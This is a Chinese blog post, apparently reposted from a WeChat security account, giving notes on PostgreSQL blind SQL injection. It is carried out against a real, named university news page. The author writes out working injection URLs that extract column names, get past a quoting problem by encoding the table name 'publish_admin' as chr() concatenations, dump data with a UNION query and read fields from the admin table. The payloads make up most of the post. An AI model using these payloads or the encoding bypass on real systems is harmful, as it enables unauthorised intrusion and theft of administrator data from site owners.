PostgreSQL盲注笔记三

  • A+
所属分类:安全文章

语句我们是对的 


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(column_name,1,1))+from+information_schema.columns+where+table_name= publish_admin +between+0+and+256

但是为什么回出错呢??在百思不得其解中,我想到了不是有工具吗???我们用工具抓包下 看看 人家的是什么语句 

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(column_name,1,1))+from+information_schema.columns+where+table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110)+limit+1+OFFSET+1)+between+0+and+256

正确、、、、、、醉了、、、、大家看大没、、、、 
table_name= publish_admin 
table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110) 
绕过去了、、出来了  、、 这就是爆字段的语句、、、 
我们来继续看看  怎么爆、、字段的内容、、、其实还是可以这样的: 


http://www.u-tokyo.ac.jp/news/detail_e.html?id=0+union+select+null,version(),1,version(),version(),version(),null,version(),version(),version(),null,null,version(),version(),column_name+from+information_schema.columns+where+table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110)+limit+1+offset+0+--+

不过这不是我们今天的目的 
不过最后还是搞定~~ 

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(rank,1,1))+from+publish_admin+limit+1+OFFSET+0)+between+0+and+236

本文始发于微信公众号(飓风网络安全):PostgreSQL盲注笔记三

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: